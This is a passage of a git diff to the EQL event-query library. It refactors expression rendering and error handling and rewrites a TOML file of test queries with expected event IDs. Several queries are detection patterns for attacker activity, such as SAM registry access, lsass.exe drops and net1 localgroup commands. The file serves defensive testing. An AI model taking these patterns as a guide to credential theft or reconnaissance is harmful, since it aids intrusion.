(\n{}\n)'.format(expr, self.indent(delim.join(values))) + return '{lhs} {op} (\n{rhs}\n)'.format(lhs=expr, op=operator, rhs=self.indent(delim.join(values))) else: delim = ', ' - return '{} in ({})'.format(expr, delim.join(values)) + return '{lhs} {op} ({rhs})'.format(lhs=expr, op=operator, rhs=delim.join(values)) class BaseCompound(Expression): @@ -740,11 +813,14 @@ def __invert__(self): def render(self, precedence=None): """Convert wildcard functions back to the short hand syntax.""" + if isinstance(self.term, InSet): + return self.term.render(precedence, negate=True) + if isinstance(self.term, FunctionCall) and self.term.name == 'wildcard': if len(self.term.arguments) == 2 and isinstance(self.term.arguments[1], String): lhs, rhs = self.term.arguments return Comparison(lhs, Comparison.NE, rhs).render(precedence) - return super(Not, self).render() + return super(Not, self).render(precedence) class And(BaseCompound): @@ -1198,3 +1274,4 @@ def copy(self): # circular dependency from .walkers import Walker, RecursiveWalker # noqa: E402 +from .functions import get_function # noqa: E402 diff --git a/eql/build.py b/eql/build.py index 20baeb6..67fc5cd 100644 --- a/eql/build.py +++ b/eql/build.py @@ -18,6 +18,7 @@ def render_engine(analytics, engine_type, config=None, analytics_only=False): :return str: Returns the base engine """ load_extensions(force=False) + engine_type = engine_type.lstrip(".") if engine_type not in TextEngine.extensions: raise KeyError("Unable to translate to unknown extension {}.".format(engine_type)) engine_cls = TextEngine.extensions[engine_type] @@ -97,10 +98,13 @@ def get_engine(query, config=None): :param str|dict|EqlAnalytic|PipedQuery query: The query text or parsed query :param dict config: The configuration for PythonEngine """ - if isinstance(query, dict): - query = parse_analytic(query) - elif is_string(query): - query = parse_query(query, implied_base=True, implied_any=True) + engine = PythonEngine(config) + + with engine: + if isinstance(query, dict): + query = parse_analytic(query) + elif is_string(query): + query = parse_query(query, implied_base=True, implied_any=True) def run_engine(inputs): results = [] diff --git a/eql/engine.py b/eql/engine.py index b89ccca..3aff2db 100644 --- a/eql/engine.py +++ b/eql/engine.py @@ -327,7 +327,7 @@ def walk_array(scope): # type: (Scope) -> bool count = count + 1 return count return walk_array - raise TypeError(u"Invalid signature {}".format(node)) + raise EqlCompileError(u"Invalid signature {}".format(node)) def _function_array_search(self, arguments): node = FunctionCall('arraySearch', arguments) @@ -344,7 +344,7 @@ def walk_array(scope): # type: (Scope) -> bool return True return False return walk_array - raise TypeError(u"Invalid signature {}".format(node)) + raise EqlCompileError(u"Invalid signature {}".format(node)) def _convert_function_call(self, node): # type: (FunctionCall) -> callable name = node.name @@ -360,7 +360,7 @@ def _convert_function_call(self, node): # type: (FunctionCall) -> callable func = func.get_callback(*node.arguments) if not callable(func): - raise KeyError("Unknown function {}".format(node.name)) + raise EqlCompileError("Unknown function {}".format(node.name)) get_arguments = self._convert_tuple(node.arguments) @@ -430,7 +430,7 @@ def compare(x, y): def compare(x, y): return types_match(x, y) and x >= y else: - raise NotImplementedError("Unknown comparator {}".format(node.comparator)) + raise EqlCompileError("Unknown comparator {}".format(node.comparator)) def callback(scope): # type: (Scope) -> bool left = get_left(scope) @@ -439,6 +439,9 @@ def callback(scope): # type: (Scope) -> bool return callback + def _convert_math_operation(self, node): # type: (MathOperation) -> callable + return self.convert(node.to_function_call()) + def _convert_and(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] @@ -765,7 +768,7 @@ def _convert_named_subquery(self, node): # type: (NamedSubquery) -> callable elif node.query_type == NamedSubquery.EVENT: return self._get_event_of(node.query) else: - raise ValueError("Unknown query type {}".format(node.query_type)) + raise EqlCompileError("Unknown query type {}".format(node.query_type)) def _get_descendant_of(self, node): # type: (EventQuery) -> callable sources = set() @@ -1093,7 +1096,7 @@ def callback(event): # type: (Event) -> None self._convert_sequence(base_query, output_pipe) else: - raise NotImplementedError("Unsupported {}".format(type(base_query).__name__)) + raise EqlCompileError("Unsupported {}".format(type(base_query).__name__)) def _convert_analytic(self, analytic): # type: (EqlAnalytic) -> callable analytic_id = analytic.id or analytic.name @@ -1181,7 +1184,7 @@ def reduce_events(self, inputs, analytic_id=None, finalize=True): elif isinstance(data, dict): events = [Event.from_data(data)] else: - raise ValueError("Unable to reduce {}".format(data)) + raise EqlCompileError("Unable to reduce {}".format(data)) for reducer in self._reducer_hooks[analytic_id]: reducer(events) diff --git a/eql/etc/test_data.json b/eql/etc/test_data.json index 90fab7e..4a08e7f 100644 --- a/eql/etc/test_data.json +++ b/eql/etc/test_data.json @@ -1261,7 +1261,7 @@ }, { "event_subtype_full": "request_event", - "event_type": "generic", + "event_type": "dns", "event_type_full": "dns_event", "opcode": 3008, "pid": 924, diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml index 833528a..4682fba 100644 --- a/eql/etc/test_queries.toml +++ b/eql/etc/test_queries.toml @@ -1,48 +1,48 @@ -[queries.q000] +[[queries]] query = 'process where serial_event_id = 1' expected_event_ids = [1] -[queries.q001] +[[queries]] query = 'process where serial_event_id < 4' expected_event_ids = [1, 2, 3] -[queries.q002] +[[queries]] query = 'process where true | head 6' expected_event_ids = [1, 2, 3, 4, 5, 6] -[queries.q003] +[[queries]] query = 'process where false' expected_event_ids = [] -[queries.q004] +[[queries]] expected_event_ids = [] query = 'process where missing_field != null' -[queries.q005] +[[queries]] expected_event_ids = [1, 2, 3, 4, 5] query = 'process where bad_field == null | head 5' -[queries.q006] +[[queries]] query = ''' process where process_name == "impossible name" or (serial_event_id < 4.5 and serial_event_id >= 3.1) ''' expected_event_ids = [4] -[queries.q007] +[[queries]] tags = ["comparisons", "pipes"] query = ''' process where serial_event_id <= 8 and serial_event_id > 7 | filter serial_event_id == 8''' expected_event_ids = [8] -[queries.q008] +[[queries]] query = ''' process where true | filter serial_event_id <= 10 | filter serial_event_id > 6''' expected_event_ids = [7, 8, 9, 10] -[queries.q009] +[[queries]] query = ''' process where true | filter serial_event_id <= 10 @@ -50,7 +50,7 @@ process where true | head 2''' expected_event_ids = [7, 8] -[queries.q010] +[[queries]] query = ''' process where true | head 1000 @@ -60,43 +60,43 @@ process where true ''' expected_event_ids = [9, 10] -[queries.q011] +[[queries]] query = ''' process where serial_event_id<=8 and serial_event_id > 7 ''' expected_event_ids = [8] -[queries.q012] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code >= 0' -[queries.q013] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where 0 <= exit_code' -[queries.q014] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code <= 0' -[queries.q015] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code < 1' -[queries.q016] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where exit_code > -1' -[queries.q017] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303] query = 'process where -1 < exit_code' -[queries.q018] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [] query = ''' @@ -105,69 +105,69 @@ process where not (exit_code > -1) | head 10 ''' -[queries.q019] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [1, 2, 3, 4, 5, 6, 7] query = 'process where not (exit_code > -1) | head 7' -[queries.q020] +[[queries]] note = "check that comparisons against null values return false" expected_event_ids = [1, 2, 3, 4, 5, 6, 7] query = 'process where not (-1 < exit_code) | head 7' -[queries.q021] +[[queries]] query = 'process where exit_code > 0' expected_event_ids = [] -[queries.q022] +[[queries]] query = 'process where exit_code < 0' expected_event_ids = [] -[queries.q023] +[[queries]] query = 'process where 0 < exit_code' expected_event_ids = [] -[queries.q024] +[[queries]] query = 'process where 0 > exit_code' expected_event_ids = [] -[queries.q025] +[[queries]] query = 'process where (serial_event_id<=8 and serial_event_id > 7) and (opcode=3 and opcode>2)' expected_event_ids = [8] -[queries.q026] +[[queries]] query = 'process where (serial_event_id<9 and serial_event_id >= 7) or (opcode == pid)' expected_event_ids = [7, 8] -[queries.q027] +[[queries]] query = 'process where process_name == "VMACTHLP.exe" and unique_pid == 12 | filter true' expected_event_ids = [12] -[queries.q028] +[[queries]] query = ''' process where process_name in ("python.exe", "SMSS.exe", "explorer.exe") | unique process_name''' expected_event_ids = [3, 34, 48] -[queries.q029] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "Explorer.exe") | unique length(process_name)''' expected_event_ids = [3, 34, 48] -[queries.q030] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique length(process_name) == length("python.exe")''' expected_event_ids = [3, 48] -[queries.q031] +[[queries]] query = ''' process where process_name in ("Python.exe", "smss.exe", "explorer.exe") | unique process_name != "python.exe"''' expected_event_ids = [3, 48] -[queries.q032] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique process_name @@ -175,7 +175,7 @@ process where process_name in ("python.exe", "smss.exe", "explorer.exe") | tail 1''' expected_event_ids = [34] -[queries.q033] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe", "explorer.exe") | unique process_name @@ -183,55 +183,55 @@ process where process_name in ("python.exe", "smss.exe", "explorer.exe") | head 1''' expected_event_ids = [34] -[queries.q034] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | unique process_name parent_process_name''' expected_event_ids = [3, 48, 50, 54, 78] -[queries.q035] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | unique process_name, parent_process_name''' expected_event_ids = [3, 48, 50, 54, 78] -[queries.q036] +[[queries]] query = ''' process where process_name in ("python.exe", "smss.exe") | head 5 | unique process_name parent_process_name''' expected_event_ids = [3, 48, 50, 54] -[queries.q037] +[[queries]] expected_event_ids = [57] query = ''' registry where length(bytes_written_string_list) == 2 and bytes_written_string_list[1] == "EN"''' -[queries.q038] +[[queries]] query = ''' registry where key_path == "*\\MACHINE\\SAM\\SAM\\*\\Account\\Us*ers\\00*03E9\\F"''' expected_event_ids = [79] -[queries.q039] +[[queries]] query = ''' process where process_path == "*\\red_ttp\\wininit.*" and opcode in (0,1,2,3,4)''' expected_event_ids = [84, 85] -[queries.q040] +[[queries]] query = ''' file where file_name == "csrss.exe" and opcode=0 and descendant of [process where opcode in (1,3) and process_name="cmd.exe"] ''' expected_event_ids = [72] -[queries.q041] +[[queries]] query = ''' process where opcode=1 and process_name == "csrss.exe" and descendant of [file where file_name == "csrss.exe" and opcode=0] ''' expected_event_ids = [73] -[queries.q042] +[[queries]] query = ''' process where opcode=1 and process_name == "smss.exe" and descendant of [ @@ -243,60 +243,75 @@ process where opcode=1 and process_name == "smss.exe" ''' expected_event_ids = [78] -[queries.q043] +[[queries]] query = ''' file where file_path="*\\red_ttp\\winin*.*" and opcode in (0,1,2) and user_name="vagrant" ''' expected_event_ids = [83, 86] -[queries.q044] +[[queries]] +query = ''' +file where file_path="*\\red_ttp\\winin*.*" + and opcode not in (0,1,2) and user_name="vagrant" +''' +expected_event_ids = [] + +[[queries]] +query = ''' +file where file_path="*\\red_ttp\\winin*.*" + and opcode not in (3, 4, 5, 6 ,7) and user_name="vagrant" +''' +expected_event_ids = [83, 86] + + +[[queries]] query = ''' file where file_name in ("wininit.exe", "lsass.exe") and opcode == 2 ''' expected_event_ids = [65, 86] -[queries.q045] +[[queries]] query = ''' file where true | tail 3''' expected_event_ids = [92, 95, 96] -[queries.q046] +[[queries]] query = ''' process where opcode in (1,3) and process_name in (parent_process_name, "SYSTEM") ''' expected_event_ids = [2, 50, 51] -[queries.q047] +[[queries]] expected_event_ids = [92, 95, 96, 91] query = ''' file where true | tail 4 | sort file_path''' -[queries.q048] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5 event_subtype_full process_name''' -[queries.q049] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5 event_subtype_full null_field process_name''' -[queries.q050] +[[queries]] expected_event_ids = [2, 1, 4, 3, 5] query = ''' process where true | head 5 | sort md5, event_subtype_full, null_field, process_name''' -[queries.q051] +[[queries]] expected_event_ids = [2, 1] query = ''' process where true @@ -304,7 +319,7 @@ process where true | sort md5 event_subtype_full null_field process_name | head 2''' -[queries.q052] +[[queries]] expected_event_ids = [1, 2, 3, 4, 5] query = ''' process where true @@ -312,27 +327,56 @@ process where true | sort md5 event_subtype_full null_field process_name | sort serial_event_id''' -[queries.q053] +[[queries]] query = ''' -sequence [process where serial_event_id = 1] [process where serial_event_id = 2]''' +sequence + [process where serial_event_id = 1] + [process where serial_event_id = 2] +''' expected_event_ids = [1, 2] -[queries.q054] +[[queries]] query = ''' -sequence [process where serial_event_id < 5] [process where serial_event_id = 5]''' +sequence + [process where serial_event_id < 5] + [process where serial_event_id = 5] +''' expected_event_ids = [4, 5] -[queries.q055] +[[queries]] query = ''' -sequence [process where serial_event_id=1] by unique_pid [process where true] by unique_ppid''' +sequence + [process where serial_event_id=1] by unique_pid + [process where true] by unique_ppid''' expected_event_ids = [1, 2] -[queries.q056] +[[queries]] +query = ''' +sequence + [process where serial_event_id<3] by unique_pid + [process where true] by unique_ppid +''' +expected_event_ids = [1, 2, 2, 3] + +[[queries]] +query = ''' +sequence + [process where serial_event_id<3] by unique_pid * 2 + [process where true] by unique_ppid * 2 +''' +expected_event_ids = [1, 2, 2, 3] + + +[[queries]] query = ''' -sequence [process where serial_event_id<3] by unique_pid [process where true] by unique_ppid''' +sequence + [process where serial_event_id<3] by unique_pid * 2, length(unique_pid), string(unique_pid) + [process where true] by unique_ppid * 2, length(unique_ppid), string(unique_ppid) +''' expected_event_ids = [1, 2, 2, 3] -[queries.q057] + +[[queries]] query = ''' sequence [file where event_subtype_full == "file_create_event"] by file_path @@ -343,7 +387,7 @@ sequence | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q058] +[[queries]] query = ''' sequence with maxspan=1d [file where event_subtype_full == "file_create_event"] by file_path @@ -354,7 +398,7 @@ sequence with maxspan=1d | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q059] +[[queries]] query = ''' sequence with maxspan=1h [file where event_subtype_full == "file_create_event"] by file_path @@ -365,7 +409,7 @@ sequence with maxspan=1h | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q060] +[[queries]] query = ''' sequence with maxspan=1m [file where event_subtype_full == "file_create_event"] by file_path @@ -376,7 +420,7 @@ sequence with maxspan=1m | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q061] +[[queries]] query = ''' sequence with maxspan=10s [file where event_subtype_full == "file_create_event"] by file_path @@ -387,7 +431,7 @@ sequence with maxspan=10s | tail 2''' expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75] -[queries.q062] +[[queries]] query = ''' sequence with maxspan=0.5s [file where event_subtype_full == "file_create_event"] by file_path @@ -398,7 +442,7 @@ sequence with maxspan=0.5s | tail 2''' expected_event_ids = [] -[queries.q063] +[[queries]] query = ''' sequence [process where serial_event_id < 5] @@ -406,7 +450,7 @@ sequence ''' expected_event_ids = [1, 2, 2, 3, 3, 4] -[queries.q064] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="svchost.exe"] by unique_pid @@ -414,7 +458,7 @@ sequence ''' expected_event_ids = [55, 56] -[queries.q065] +[[queries]] query = ''' sequence [file where opcode=0] by unique_pid @@ -422,7 +466,7 @@ sequence | head 1''' expected_event_ids = [55, 61] -[queries.q066] +[[queries]] query = ''' sequence [file where opcode=0] by unique_pid @@ -430,7 +474,7 @@ sequence | filter events[1].serial_event_id == 92''' expected_event_ids = [87, 92] -[queries.q067] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="*.exe"] by unique_pid @@ -439,7 +483,7 @@ until [process where opcode=5000] by unique_ppid | head 1''' expected_event_ids = [55, 61] -[queries.q068] +[[queries]] query = ''' sequence [file where opcode=0 and file_name="*.exe"] by unique_pid @@ -448,7 +492,7 @@ until [process where opcode=1] by unique_ppid | head 1''' expected_event_ids = [] -[queries.q069] +[[queries]] query = ''' join [file where opcode=0 and file_name="*.exe"] by unique_pid @@ -457,14 +501,15 @@ until [process where opcode=1] by unique_ppid | head 1''' expected_event_ids = [61, 59] -[queries.q070] +[[queries]] query = ''' join by user_name [process where opcode in (1,3) and process_name="smss.exe"] - [process where opcode in (1,3) and process_name == "python.exe"]''' + [process where opcode in (1,3) and process_name == "python.exe"] +''' expected_event_ids = [78, 48] -[queries.q071] +[[queries]] query = ''' join by unique_pid [process where opcode=1] @@ -472,7 +517,15 @@ join by unique_pid [file where opcode == 0 and file_name == "lsass.exe"]''' expected_event_ids = [54, 55, 61] -[queries.q072] +[[queries]] +query = ''' +join by string(unique_pid) + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"]''' +expected_event_ids = [54, 55, 61] + +[[queries]] query = ''' join by unique_pid [process where opcode=1] @@ -481,28 +534,39 @@ join by unique_pid until [file where opcode == 2]''' expected_event_ids = [] -[queries.q073] +[[queries]] +query = ''' +join by string(unique_pid), unique_pid, unique_pid * 2 + [process where opcode=1] + [file where opcode=0 and file_name="svchost.exe"] + [file where opcode == 0 and file_name == "lsass.exe"] +until [file where opcode == 2]''' +expected_event_ids = [] + +[[queries]] query = ''' join [file where opcode=0 and file_name="svchost.exe"] by unique_pid - [process where opcode == 1] by unique_ppid''' + [process where opcode == 1] by unique_ppid +''' expected_event_ids = [55, 56] -[queries.q074] +[[queries]] query = ''' join by unique_pid [process where opcode in (1,3) and process_name="python.exe"] [file where file_name == "*.exe"]''' expected_event_ids = [54, 55] -[queries.q075] +[[queries]] query = ''' join by user_name [process where opcode in (1,3) and process_name="python.exe"] - [process where opcode in (1,3) and process_name == "smss.exe"]''' + [process where opcode in (1,3) and process_name == "smss.exe"] +''' expected_event_ids = [48, 78] -[queries.q076] +[[queries]] query = ''' join [process where opcode in (1,3) and process_name="python.exe"] @@ -510,34 +574,35 @@ join ''' expected_event_ids = [48, 3, 50, 78] -[queries.q077] +[[queries]] expected_event_ids = [] query = ''' process where fake_field == "*"''' -[queries.q078] +[[queries]] expected_event_ids = [1, 2, 3, 4] query = ''' process where fake_field != "*" | head 4''' -[queries.q079] +[[queries]] expected_event_ids = [1, 2, 3, 4] query = ''' process where not (fake_field == "*") | head 4''' -[queries.q080] +[[queries]] expected_event_ids = [] query = ''' registry where invalid_field_name != null''' -[queries.q081] +[[queries]] expected_event_ids = [] query = ''' -registry where length(bad_field) > 0''' +registry where length(bad_field) > 0 +''' -[queries.q082] +[[queries]] query = ''' process where opcode == 1 and process_name in ("net.exe", "net1.exe") @@ -546,44 +611,44 @@ process where opcode == 1 and command_line == "*group *admin*" and command_line != "* /add*"''' expected_event_ids = [97] -[queries.q083] +[[queries]] expected_event_ids = [1, 55, 57, 63, 75304] query = ''' any where true | unique event_type_full''' -[queries.q084] +[[queries]] query = ''' process where opcode=1 and process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [62, 68, 78] -[queries.q085] +[[queries]] query = ''' process where process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [62, 64, 68, 69, 78, 80] -[queries.q086] +[[queries]] query = ''' process where opcode=2 and process_name in ("services.exe", "smss.exe", "lsass.exe") and descendant of [process where process_name == "cmd.exe" ]''' expected_event_ids = [64, 69, 80] -[queries.q087] +[[queries]] query = ''' process where process_name="svchost.exe" and child of [file where file_name="svchost.exe" and opcode=0]''' expected_event_ids = [56, 58] -[queries.q088] +[[queries]] query = ''' process where process_name="svchost.exe" and not child of [file where file_name="svchost.exe" and opcode=0] | head 3''' expected_event_ids = [11, 13, 15] -[queries.q089] +[[queries]] query = ''' process where process_name="lsass.exe" and child of [ @@ -593,7 +658,7 @@ process where process_name="lsass.exe" ''' expected_event_ids = [62, 64] -[queries.q090] +[[queries]] query = ''' file where child of [ process where child of [ @@ -603,28 +668,28 @@ file where child of [ | tail 1''' expected_event_ids = [91] -[queries.q091] +[[queries]] query = ''' file where process_name = "python.exe" | unique unique_pid''' expected_event_ids = [55, 95] -[queries.q092] +[[queries]] query = ''' file where event of [process where process_name = "python.exe" ] | unique unique_pid''' expected_event_ids = [55, 95] -[queries.q093] +[[queries]] query = ''' process where process_name = "python.exe"''' expected_event_ids = [48, 50, 51, 54, 93] -[queries.q094] +[[queries]] query = 'process where event of [process where process_name = "python.exe" ]' expected_event_ids = [48, 50, 51, 54, 93] -[queries.q095] +[[queries]] query = ''' sequence [file where file_name="lsass.exe"] by file_path,process_path @@ -632,7 +697,7 @@ sequence ''' expected_event_ids = [61, 62] -[queries.q096] +[[queries]] query = ''' sequence by user_name [file where file_name="lsass.exe"] by file_path, process_path @@ -640,7 +705,7 @@ sequence by user_name ''' expected_event_ids = [61, 62] -[queries.q097] +[[queries]] query = ''' sequence by pid [file where file_name="lsass.exe"] by file_path,process_path @@ -648,7 +713,7 @@ sequence by pid ''' expected_event_ids = [] -[queries.q098] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by file_path @@ -658,7 +723,7 @@ sequence by user_name | tail 1''' expected_event_ids = [88, 89, 90, 91] -[queries.q099] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by pid,file_path @@ -667,7 +732,7 @@ until [process where opcode=2] by ppid,process_path ''' expected_event_ids = [] -[queries.q100] +[[queries]] query = ''' sequence by user_name [file where opcode=0] by pid,file_path @@ -676,7 +741,7 @@ until [process where opcode=5] by ppid,process_path | head 2''' expected_event_ids = [55, 59, 61, 65] -[queries.q101] +[[queries]] query = ''' sequence by pid [file where opcode=0] by file_path @@ -686,7 +751,7 @@ sequence by pid | tail 1''' expected_event_ids = [] -[queries.q102] +[[queries]] query = ''' join by user_name [file where true] by pid,file_path @@ -694,7 +759,7 @@ join by user_name | head 2''' expected_event_ids = [55, 56, 59, 58] -[queries.q103] +[[queries]] query = ''' sequence [process where true] by unique_pid @@ -703,42 +768,42 @@ sequence | head 4''' expected_event_ids = [54, 55, 56, 54, 61, 62, 54, 67, 68, 54, 72, 73] -[queries.q104] +[[queries]] query = ''' process where command_line == "*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q105] +[[queries]] query = ''' process where command_line == "*%*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q106] +[[queries]] query = ''' process where command_line == "%*%*" ''' expected_event_ids = [4, 6, 28] -[queries.q107] +[[queries]] expected_event_ids = [11, 60, 63] query = ''' any where process_name == "svchost.exe" | unique_count event_type_full process_name''' -[queries.q108] +[[queries]] expected_event_ids = [63, 60, 11] query = ''' any where process_name == "svchost.exe" | sort event_type_full serial_event_id | unique_count event_type_full process_name''' -[queries.q109] +[[queries]] expected_event_ids = [60] query = ''' any where process_name == "svchost.exe" | unique_count event_type_full opcode | filter count == 7''' -[queries.q110] +[[queries]] expected_event_ids = [11] query = ''' any where process_name == "svchost.exe" @@ -746,65 +811,65 @@ any where process_name == "svchost.exe" | filter percent >= .5 ''' -[queries.q111] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, 'En-uS')''' -[queries.q112] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, 'En')''' -[queries.q113] +[[queries]] expected_event_ids = [57] query = ''' registry where length(bytes_written_string_list) > 0 and bytes_written_string_list[0] == 'EN-us' ''' -[queries.q114] +[[queries]] expected_event_ids = [57] query = ''' registry where bytes_written_string_list[0] == 'EN-us' ''' -[queries.q115] +[[queries]] expected_event_ids = [57] query = ''' registry where bytes_written_string_list[1] == 'EN' ''' -[queries.q116] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+localgroup\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q117] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+\w+\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q118] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+\w{4,15}\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q119] +[[queries]] expected_event_ids = [98] query = ''' process where match(?'.*?net1\s+\w{4,15}\s+.*?', command_line) ''' -[queries.q120] +[[queries]] query = ''' process where matchLite(?'.*?net1\s+[localgrup]{4,15}\s+.*?', command_line) ''' expected_event_ids = [98] -[queries.q121] +[[queries]] query = ''' process where 'net.EXE' == original_file_name | filter process_name="net*.exe" @@ -812,7 +877,7 @@ process where 'net.EXE' == original_file_name expected_event_ids = [97] note = "check that case insensitive comparisons are performed even for lhs strings." -[queries.q122] +[[queries]] query = ''' process where process_name == original_file_name | filter process_name='net*.exe' @@ -820,7 +885,7 @@ process where process_name == original_file_name expected_event_ids = [97, 98] note = "check that case insensitive comparisons are performed for fields." -[queries.q123] +[[queries]] query = ''' process where original_file_name == process_name | filter length(original_file_name) > 0 @@ -828,210 +893,210 @@ process where original_file_name == process_name expected_event_ids = [97, 98, 75273, 75303] description = "check that case insensitive comparisons are performed for fields." -[queries.q124] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'exploRER.') ''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q125] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'expLORER.exe') ''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q126] +[[queries]] query = ''' file where opcode=0 and endsWith(file_name, 'loREr.exe')''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q127] +[[queries]] query = ''' file where opcode=0 and startsWith(file_name, 'explORER.EXE')''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q128] +[[queries]] query = ''' file where opcode=0 and startsWith('explorer.exeaaaaaaaa', file_name)''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q129] +[[queries]] query = ''' file where opcode=0 and serial_event_id = 88 and startsWith('explorer.exeaAAAA', 'EXPLORER.exe')''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q130] +[[queries]] query = ''' file where opcode=0 and stringContains('ABCDEFGHIexplorer.exeJKLMNOP', file_name) ''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q131] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plore') == 2 and not indexOf(file_name, '.pf') ''' expected_event_ids = [88] description = "check built-in string functions" -[queries.q132] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'explorer.') and indexOf(file_name, 'plore', 100) ''' expected_event_ids = [] description = "check built-in string functions" -[queries.q133] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 0) == 2''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q134] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 2)''' expected_event_ids = [88, 92] description = "check built-in string functions" -[queries.q135] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 4)''' expected_event_ids = [] description = "check built-in string functions" -[queries.q136] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'thing that never happened')''' expected_event_ids = [] description = "check built-in string functions" -[queries.q137] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'plorer.', 2) == 2''' expected_event_ids = [88, 92] description = "check substring ranges" -[queries.q138] +[[queries]] query = ''' file where opcode=0 and indexOf(file_name, 'explorer.', 0) == 0''' expected_event_ids = [88, 92] description = "check substring ranges" -[queries.q139] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, 0, 4) == 'expl' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q140] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, 1, 3) == 'xp' ''' expected_event_ids = [88] description = "chaeck substring ranges" -[queries.q141] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, -4) == '.exe' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q142] +[[queries]] query = ''' file where serial_event_id=88 and substring(file_name, -4, -1) == '.ex' ''' expected_event_ids = [88] description = "check substring ranges" -[queries.q143] +[[queries]] query = ''' process where add(serial_event_id, 0) == 1 and add(0, 1) == serial_event_id''' expected_event_ids = [1] description = "test built-in math functions" -[queries.q144] +[[queries]] query = ''' process where subtract(serial_event_id, -5) == 6''' expected_event_ids = [1] description = "test built-in math functions" -[queries.q145] +[[queries]] query = ''' process where multiply(6, serial_event_id) == 30 and divide(30, 4.0) == 7.5''' expected_event_ids = [5] description = "test built-in math functions" -[queries.q146] +[[queries]] query = ''' process where modulo(11, add(serial_event_id, 1)) == serial_event_id''' expected_event_ids = [1, 2, 3, 5, 11] description = "test built-in math functions" -[queries.q147] +[[queries]] query = ''' process where serial_event_id == number('5')''' expected_event_ids = [5] description = "test string/number conversions" -[queries.q148] +[[queries]] expected_event_ids = [50] description = "test string/number conversions" query = ''' process where serial_event_id == number('0x32', 16)''' -[queries.q149] +[[queries]] expected_event_ids = [50] description = "test string/number conversions" query = ''' process where serial_event_id == number('32', 16)''' -[queries.q150] +[[queries]] query = ''' process where number(serial_event_id) == number(5)''' expected_event_ids = [5] description = "test string/number conversions" -[queries.q151] +[[queries]] query = ''' process where concat(serial_event_id, ':', process_name, opcode) == '5:winINIT.exe3' ''' expected_event_ids = [5] description = "test string concatenation" -[queries.q152] +[[queries]] query = ''' process where process_name != original_file_name | filter length(original_file_name) > 0''' expected_event_ids = [] description = "check that case insensitive comparisons are performed for fields." -[queries.q153] +[[queries]] query = ''' sequence by unique_pid [process where opcode=1 and process_name == 'msbuild.exe'] [network where true]''' expected_event_ids = [75273, 75304] description = "test that process sequences are working correctly" -[queries.q154] 